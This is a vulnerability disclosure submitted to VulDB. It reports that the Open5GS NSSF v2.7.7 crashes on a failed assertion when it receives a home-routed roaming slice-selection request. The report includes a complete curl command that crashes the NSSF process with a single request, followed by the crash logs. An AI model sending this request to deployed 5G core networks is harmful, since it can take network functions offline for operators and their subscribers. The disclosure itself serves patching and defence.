Submit #808421: Open5gs NSSF v2.7.7 Denial of Serviceinfo

TitelOpen5gs NSSF v2.7.7 Denial of Service
Beschreibung### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description NSSF crashes when a client sends a `Home Routed Roaming` style `Nnssf_NSSelection` request containing both: - `home-plmn-id` - `slice-info-request-for-pdu-session.homeSnssai` and the local NSSF configuration does not populate `ogs_local_conf()->num_of_serving_plmn_id`. In the Home-NSSF branch, the handler unconditionally asserts that at least one serving PLMN is configured before it builds the discovery query toward the Home NSSF: ```c ogs_assert(ogs_local_conf()->num_of_serving_plmn_id); ``` In the live `basic` Docker deployment used here, `/home/ubuntu/docker-open5gs/configs/basic/nssf.yaml` has no `serving` block, so a single request can trigger the assertion and crash the process. ### Steps to reproduce ```bash IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' nssf) curl --http2-prior-knowledge -m 5 -sS -i --get \ "http://$IP/nnssf-nsselection/v2/network-slice-information" \ --data-urlencode 'nf-id=test-amf' \ --data-urlencode 'nf-type=AMF' \ --data-urlencode 'home-plmn-id={"mcc":"999","mnc":"70"}' \ --data-urlencode 'slice-info-request-for-pdu-session={"sNssai":{"sst":1,"sd":"000001"},"homeSnssai":{"sst":1,"sd":"000001"},"roamingIndication":"HOME_ROUTED_ROAMING"}' ``` Then check: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' nssf docker logs --tail 30 nssf ``` ### Logs ```shell curl: (56) Recv failure: Connection reset by peer exited 139 2026-04-10T18:15:35.794276249Z 04/10 18:15:35.690: [nssf] FATAL: nssf_nnrf_nsselection_handle_get_from_amf_or_vnssf: Assertion `ogs_local_conf()->num_of_serving_plmn_id' failed. (../src/nssf/nnssf-handler.c:118) ``` ### Expected behaviour NSSF should reject the request with a normal HTTP error response such as `400 Bad Request` or `500 Internal Server Error` when Home-NSSF discovery cannot be constructed due to missing local serving PLMN configuration. ### Observed Behaviour The HTTP/2 stream is reset and the NSSF process exits with code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
Quelle⚠️ https://github.com/open5gs/open5gs/issues/4432
Benutzer
 FrankyLin (UID 94345)
Einreichung20.04.2026 20:10 (vor 2 Monaten)
Moderieren07.05.2026 18:56 (17 days later)
StatusAkzeptiert
VulDB Eintrag361907 [Open5GS bis 2.7.7 NSSF nnssf-handler.c Denial of Service]
Punkte20

ZurückÜbersichtWeiter

Want to stay up to date on a daily basis?

Enable the mail alert feature now!